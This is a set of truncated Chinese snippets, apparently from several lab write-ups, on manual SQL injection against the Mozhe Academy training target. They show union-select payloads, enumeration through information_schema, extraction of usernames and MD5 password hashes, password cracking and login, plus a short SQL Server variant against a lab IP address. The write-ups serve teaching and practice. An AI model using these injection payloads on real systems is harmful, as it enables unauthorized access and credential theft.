一开始我直接在tingjigonggao后面加上' union select 1,version(),database(),4 %23发现返回的只有正常页面后来尝试了下发现把tingjigonggao改成1或者其他内容就能返回我们想要的数据库名了,我觉得可能是停机公告是由内容查询出来的所以直接就把标题和内容的位置占据了,把我们想让他显示出来的版本号和数据库名给盖...
information_schema:MySQL自带的数据库,存储了数据库中所有的数据库、表和列信息 information_schema.tables:所有表信息 information_schema.columns:所有列信息 table_schema:数据库名称 table_name:表名称 column_name:列名称 group_concat(table_name):列出所有表名 __EOF__...
回显位置为 2 和 3 爆当前数据库 id=1' union select 1,2,database(),4--+ 得到数据库是 mozhe_discuz_stormgroup 爆表名 id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()--+ 得到数据表为 notice,stormgroup_member 爆列名 ...
2.查看当前数据库名和版本 id=' union select '1',database(),version(),'4' --+ 这里命令前面不需要加引号 得到的结果是数据库名为:mozhe_discuz_stormgroup 数据库版本为:10.2.15-MariaDB-log 3.查看当前数据库中的所有表 id=' union select '1',group_concat(table_name),'3','4' from informa...
先浏览页面判断存在注入 >查长度>查数据库>查表>查字段>查数据数量>查用户+密码>解密登录 找不到可注入点可以观察网页是否可以跳转到其他页面,并重新寻找注入点,查询的时候尽量使用group_concat()防止漏数据。 (1. 登录页面没有账号密码,只能暴破或者SQL注入数据库查看帐号密码 2. 发现公告中存在注入点 3. 通过...
步骤五:查看当前数据库名称及版本 发现数据库名和数据库版本 id=1 and 1=2 union select 1,database(),version(),4 步骤六:查看当前数据库中的所有表名 id=1 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' ...
尝试读取第二条用户数据,用户名同样为mozhe,密码为另一串MD5加密的数据。解密后得到密码为601663,成功登录。使用sqlmap进行表数据获取用户数据时,在已知数据库名和数据库表的情况下,执行相应的命令。其他知识点包括:在MYSQL5.0以上版本中,内置系统数据库information_schema,包含了MySQL服务器中存在的...
order by 4 通过order by查询到注入界面返回的数据列数为4 and 1=2 union select 1,2,3,4 第2列是标题,3是内容 and 1=2 union select 1,version(),database(),4 得到当前正在使用数据库和操作系统 and 1=2 union select 1,table_name,2,3 from information_schema.tables where table_schema=databa...
SQL手工注入漏洞测试(MySQL数据库) 使用墨者学院靶场测试 先浏览页面判断存在注入 >查长度>查数据库>查表>查字段>查数据数量>查用户+密码>解密登录 找不到可注入点可以观察网页是否可以跳转到其他页面,并重新寻找注入点,查询的时候尽量使用group_concat()防止漏数据。
和mysql 注入有些不同,union select 无法使用,Sql Server数据库只能用 union all 1、判断注入点。 //219.153.49.228:41635/new_list.asp?id=2 and 1=1访问成功;/new_list.asp?id=2 and 1=2访问失败。 image.png 2、判断列的情况。 order by x,x=1、2、4时成功,=3、5、6、7、8时失败。